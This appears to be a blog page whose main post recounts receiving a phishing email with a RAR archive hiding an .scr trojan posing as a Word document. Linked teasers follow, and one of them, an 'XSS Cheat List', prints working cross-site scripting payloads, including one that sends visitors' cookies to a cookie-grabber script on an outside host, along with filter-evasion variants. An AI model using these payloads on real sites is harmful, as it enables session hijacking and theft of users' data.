Today, I got a direct email from [email protected] title with “‘bombing’ Breaking News @ Northern Chan State”. It’s zipped with WinRAR : named NamKham.rar.

Inside … namkham bombrcs.doc

The SCR file type is primarily associated with ‘Script’. In November 2007 the SCR file extension started to be used to transmit a Trojan. As a script or a screen saver this file can execute other files which carry the Trojan. The SCR file may be embedded within a ZIP file which could also contain a file with a double extension.

It’s really simple fake trojan, then i scanned and analyst it. WoW It’s fuck trojan lo.. 😀 I don’t know how many people they hacked with this kind of techniques. I don’t want to point out who they are… but I know something ‘One thing is special’…

Result are as follow:

 

Attack to PlanetCreator by Trojan

Explore More

New phishing scam targets high level executives

A new phishing attack has been circulating lately, but instead of trying to dupe millions of computer users into giving up their financial information, this one is aimed at high

Read More

XP Registry tricks

Display Your Quick Launch ToolbarTip: Is your Quick Launch toolbar missing from the taskbar?To display your familiar Quick Launch toolbar:Right-click an empty area on the taskbar, click Toolbars, and then

Read More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Read More